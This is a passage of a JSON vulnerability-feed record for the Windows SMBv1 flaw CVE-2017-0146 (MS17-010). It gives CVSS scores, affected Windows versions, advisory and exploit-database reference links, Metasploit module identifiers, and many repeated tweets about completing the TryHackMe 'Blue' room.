"Brute It - I have just completed this room! 
Check it out: https://t.co/P0vO3cuyJm?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/bruteit?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/ihoruhe/status/1381730384447213573", "text": "Blue - I have just completed this room! Check it out: https://t.co/0vHkuPlF0m?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/yellephen/status/1373222110034759681", "text": "Blue - I have just completed this room! Check it out: https://t.co/WbveSWg8dJ?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/chittomodekinai/status/1376211737238626307", "text": "Blue - I have just completed this room! 
Check it out: https://t.co/ztz5xEd3UX?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click /RealTryHackMe\u3088\u308a"}, {"link": "https://twitter.com/CoolHandSquid/status/1382098669852372992", "text": "Blue - I have just completed this room! Check it out: https://t.co/zCwRy6GPJf?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/_nabeen/status/1381922890770042887", "text": "\u307e\u3060writeup\u307f\u306a\u3044\u3068\u30c0\u30e1\u306d\n\nBlue - I have just completed this room! Check it out: https://t.co/jAlK4M1Ntn?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click /RealTryHackMe\u3088\u308a"}, {"link": "https://twitter.com/BELKHIRIKhired1/status/1383176994536456201", "text": "Blue - I have just completed this room! 
Check it out: https://t.co/eoVe5ak68d?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}]}}, "extraReferences": [{"name": "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf", "refsource": "CONFIRM", "tags": [], "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf"}, {"name": "https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf", "refsource": "CONFIRM", "tags": [], "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf"}, {"name": "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02", "refsource": "MISC", "tags": [], "url": "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02"}, {"name": "41987", "refsource": "EXPLOIT-DB", "tags": [], "url": "https://www.exploit-db.com/exploits/41987/"}, {"name": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0146", "refsource": "CONFIRM", "tags": ["Patch", "Vendor Advisory"], "url": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0146"}, {"name": "41891", "refsource": "EXPLOIT-DB", "tags": [], "url": "https://www.exploit-db.com/exploits/41891/"}, {"name": "43970", "refsource": "EXPLOIT-DB", "tags": [], "url": "https://www.exploit-db.com/exploits/43970/"}, {"name": "1037991", "refsource": "SECTRACK", "tags": [], "url": "http://www.securitytracker.com/id/1037991"}, {"name": "http://packetstormsecurity.com/files/156196/SMB-DOUBLEPULSAR-Remote-Code-Execution.html", "refsource": "MISC", "tags": [], "url": "http://packetstormsecurity.com/files/156196/SMB-DOUBLEPULSAR-Remote-Code-Execution.html"}, {"name": "96707", "refsource": "BID", "tags": [], "url": 
"http://www.securityfocus.com/bid/96707"}, {"name": "http://packetstormsecurity.com/files/154690/DOUBLEPULSAR-Payload-Execution-Neutralization.html", "refsource": "MISC", "tags": [], "url": "http://packetstormsecurity.com/files/154690/DOUBLEPULSAR-Payload-Execution-Neutralization.html"}], "hash": "fe5da40eaf24d2f881990299e3b66decb863b04553874a7d4b51f12d91d98d87", "hashmap": [{"hash": "732a831a7eed3955e8de18b2d8903bc8", "key": "cvss3"}, {"hash": "cde40a13c5d43ca610b08893c2bdb748", "key": "cvelist"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "d931342d7091edb0db4db482c531ce39", "key": "cpeConfiguration"}, {"hash": "f54a01beedb777f2ca261ddba30cf1a5", "key": "published"}, {"hash": "bf11cde0d5ceb8e4aedc6a3dd6d89286", "key": "description"}, {"hash": "e758f8fa39ce9e8de2ffe527ec8b6423", "key": "affectedSoftware"}, {"hash": "226da5129ffaaee3d5b48e506b957d58", "key": "cwe"}, {"hash": "a173072793578541ea04b7baa0323592", "key": "cpe"}, {"hash": "d726e774add6189e33cf2ea0c61a2ba5", "key": "cvss"}, {"hash": "26cf6424f2bdd76a83a3a196b3158794", "key": "references"}, {"hash": "90d3da5cc0f990156ba985c80c37d178", "key": "href"}, {"hash": "dd4a1fba31e29c6988f563bdeb65c80c", "key": "affectedConfiguration"}, {"hash": "0751f4e56f29adf827144e01a128331d", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "e8dbb4c019811b96da3443b871bd4b26", "key": "cvss2"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "d68798550042e5272198c20ea65d8f01", "key": "modified"}, {"hash": "b8e67c0bcb3b33cda93643b9d21f6fe8", "key": "extraReferences"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "d1b2ee04e6815071fc75b496057c9a52", "key": "title"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0146", "id": "CVE-2017-0146", "immutableFields": [], "lastseen": "2021-02-02T06:36:30", "modified": "2018-06-21T01:29:00", "objectVersion": "1.5", 
"published": "2017-03-17T00:59:00", "references": ["http://www.securityfocus.com/bid/96707", "http://packetstormsecurity.com/files/156196/SMB-DOUBLEPULSAR-Remote-Code-Execution.html", "http://www.securitytracker.com/id/1037991", "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0146", "https://www.exploit-db.com/exploits/41891/", "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf", "https://www.exploit-db.com/exploits/43970/", "http://packetstormsecurity.com/files/154690/DOUBLEPULSAR-Payload-Execution-Neutralization.html", "https://www.exploit-db.com/exploits/41987/", "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02", "https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf"], "reporter": "cve@mitre.org", "title": "CVE-2017-0146", "type": "cve", "viewCount": 43}, "different_elements": ["reporter", "cpeConfiguration"], "edition": 6, "lastseen": "2021-02-02T06:36:30"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "microsoft:server_message_block", "name": "microsoft server message block", "operator": "eq", "version": "1.0"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:microsoft:server_message_block:1.0"], "cpe23": ["cpe:2.3:a:microsoft:server_message_block:1.0:*:*:*:*:*:*:*"], "cpeConfiguration": {}, "cvelist": ["CVE-2017-0146"], "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 
8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "cwe": ["CWE-20"], "description": "The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to execute arbitrary code via crafted packets, aka \"Windows SMB Remote Code Execution Vulnerability.\" This vulnerability is different from those described in CVE-2017-0143, CVE-2017-0144, CVE-2017-0145, and CVE-2017-0148.", "edition": 4, "enchantments": {"dependencies": {"modified": "2020-09-21T14:31:16", "references": [{"idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"], "type": "qualysblog"}, {"idList": ["ICSMA-18-058-02"], "type": "ics"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["SAINT:2D677AA07C3BC24D8037E937830ACA0D", "SAINT:8F97D6443E5FED252FF64CE37A74709D"], "type": "saint"}, {"idList": ["SMNTC-96707"], "type": "symantec"}, {"idList": ["SSV:92952", "SSV:92964"], "type": "seebug"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"], "type": "threatpost"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", 
"MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"], "type": "metasploit"}, {"idList": ["MS17_010"], "type": "canvas"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["MS:CVE-2017-0146"], "type": "mscve"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:7E6831E46F8BB1882B752045F527ABE6"], "type": "trendmicroblog"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"], "type": "openvas"}, {"idList": ["KLA11902", "KLA10977", "KLA10979"], "type": "kaspersky"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}], "rev": 2}, "score": {"modified": "2020-09-21T14:31:16", "rev": 2, "value": 9.5, "vector": "NONE"}}, "hash": "8e28bf195f3ad035ccf56633a24a9745bf73e0869f09d9f0e689301c1e301e30", "hashmap": [{"hash": "732a831a7eed3955e8de18b2d8903bc8", "key": "cvss3"}, {"hash": "cde40a13c5d43ca610b08893c2bdb748", "key": "cvelist"}, {"hash": "f54a01beedb777f2ca261ddba30cf1a5", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "bf11cde0d5ceb8e4aedc6a3dd6d89286", "key": "description"}, {"hash": "e758f8fa39ce9e8de2ffe527ec8b6423", "key": "affectedSoftware"}, {"hash": "226da5129ffaaee3d5b48e506b957d58", "key": "cwe"}, {"hash": "a173072793578541ea04b7baa0323592", "key": "cpe"}, 
{"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpeConfiguration"}, {"hash": "d726e774add6189e33cf2ea0c61a2ba5", "key": "cvss"}, {"hash": "26cf6424f2bdd76a83a3a196b3158794", "key": "references"}, {"hash": "90d3da5cc0f990156ba985c80c37d178", "key": "href"}, {"hash": "0751f4e56f29adf827144e01a128331d", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "e8dbb4c019811b96da3443b871bd4b26", "key": "cvss2"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "d68798550042e5272198c20ea65d8f01", "key": "modified"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "d1b2ee04e6815071fc75b496057c9a52", "key": "title"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0146", "id": "CVE-2017-0146", "lastseen": "2020-09-21T14:31:16", "modified": "2018-06-21T01:29:00", "objectVersion": "1.3", "published": "2017-03-17T00:59:00", "references": ["http://www.securityfocus.com/bid/96707", "http://packetstormsecurity.com/files/156196/SMB-DOUBLEPULSAR-Remote-Code-Execution.html", "http://www.securitytracker.com/id/1037991", "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0146", "https://www.exploit-db.com/exploits/41891/", "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf", "https://www.exploit-db.com/exploits/43970/", "http://packetstormsecurity.com/files/154690/DOUBLEPULSAR-Payload-Execution-Neutralization.html", "https://www.exploit-db.com/exploits/41987/", "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02", "https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf"], "reporter": "cve@mitre.org", "title": "CVE-2017-0146", "type": "cve", "viewCount": 40}, "differentElements": ["affectedConfiguration", "cpeConfiguration"], "edition": 4, "lastseen": "2020-09-21T14:31:16"}, {"bulletin": {"affectedConfiguration": [{"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", 
"version": "1607"}, {"cpeName": "microsoft:windows_server_2008", "name": "microsoft windows server 2008", "operator": "eq", "version": "r2"}, {"cpeName": "microsoft:windows_rt_8.1", "name": "microsoft windows rt 8.1", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_8.1", "name": "microsoft windows 8.1", "operator": "eq", "version": "*"}, {"cpeName": "microsoft:windows_server_2012", "name": "microsoft windows server 2012", "operator": "eq", "version": "r2"}, {"cpeName": "microsoft:windows_server_2008", "name": "microsoft windows server 2008", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_server_2012", "name": "microsoft windows server 2012", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_7", "name": "microsoft windows 7", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "*"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "1511"}, {"cpeName": "microsoft:windows_vista", "name": "microsoft windows vista", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_server_2016", "name": "microsoft windows server 2016", "operator": "eq", "version": "-"}], "affectedSoftware": [{"cpeName": "microsoft:server_message_block", "name": "microsoft server message block", "operator": "eq", "version": "1.0"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:microsoft:server_message_block:1.0"], "cpe23": ["cpe:2.3:a:microsoft:server_message_block:1.0:*:*:*:*:*:*:*"], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"children": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:microsoft:server_message_block:1.0:*:*:*:*:*:*:*", "vulnerable": true}], "operator": "OR"}, {"cpe_match": [{"cpe23Uri": "cpe:2.3:o:microsoft:windows_8.1:*:*:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": 
"cpe:2.3:o:microsoft:windows_server_2012:-:gold:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1511:*:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:*:*:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_vista:-:sp2:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "vulnerable": false}], "operator": "OR"}], "operator": "AND"}]}, "cvelist": ["CVE-2017-0146"], "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "cwe": ["CWE-20"], "description": "The SMBv1 server in Microsoft 
Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to execute arbitrary code via crafted packets, aka \"Windows SMB Remote Code Execution Vulnerability.\" This vulnerability is different from those described in CVE-2017-0143, CVE-2017-0144, CVE-2017-0145, and CVE-2017-0148.", "edition": 5, "enchantments": {"dependencies": {"modified": "2020-10-03T13:07:29", "references": [{"idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"], "type": "qualysblog"}, {"idList": ["ICSMA-18-058-02"], "type": "ics"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["SAINT:2D677AA07C3BC24D8037E937830ACA0D", "SAINT:8F97D6443E5FED252FF64CE37A74709D"], "type": "saint"}, {"idList": ["SMNTC-96707"], "type": "symantec"}, {"idList": ["SSV:92952", "SSV:92964"], "type": "seebug"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"], "type": "threatpost"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"], "type": "metasploit"}, {"idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"], "type": "attackerkb"}, {"idList": ["MS17_010"], "type": 
"canvas"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["MS:CVE-2017-0146"], "type": "mscve"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:7E6831E46F8BB1882B752045F527ABE6"], "type": "trendmicroblog"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"], "type": "openvas"}, {"idList": ["KLA11902", "KLA10977", "KLA10979"], "type": "kaspersky"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}], "rev": 2}, "exploitation": {"modified": "2020-10-03T13:07:29", "wildExploited": true, "wildExploitedSources": [{"idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"], "type": "attackerkb"}]}, "score": {"modified": "2020-10-03T13:07:29", "rev": 2, "value": 9.5, "vector": "NONE"}, "twitter": {"counter": 26, "modified": "2020-10-03T13:07:29", "tweets": [{"link": "https://twitter.com/haisenb3rg/status/1355219896876101633", "text": "Blue - I have just completed this room! 
Check it out: https://t.co/wl8T2v20v5?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/tajsec0x/status/1352766309558345729", "text": "Blue - I have just completed this room! Check it out: \n/hashtag/eternal?src=hashtag_click blue /hashtag/MS17?src=hashtag_click-010 /hashtag/CVE2017?src=hashtag_click-0144 # CVE-2017-0145 # CVE-2017-0146"}, {"link": "https://twitter.com/0xMando/status/1354504708145213440", "text": "Blue - I have just completed this room! Check it out: https://t.co/CM3xc69bUu?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe I did it mom! /darkstar7471"}, {"link": "https://twitter.com/strudinox/status/1352367654514814976", "text": "Blue - I have just completed this room! 
Check it out: https://t.co/kUcxTcX0cK?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/DaemonExala/status/1355469648314163201", "text": "Blue - I have just completed this room! Check it out: https://t.co/pRJxaPlaBu?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue /hashtag/MS17?src=hashtag_click-010 /hashtag/CVE2017?src=hashtag_click-0144 /hashtag/CVE?src=hashtag_click-2017-0145 /hashtag/CVE?src=hashtag_click-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/mell0wx/status/1350568935335358464", "text": "Blue - I have just completed this room! Check it out: https://t.co/C1ARvEqI3z?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/Wrth1_/status/1350977622700937217", "text": "Blue - I have just completed this room! 
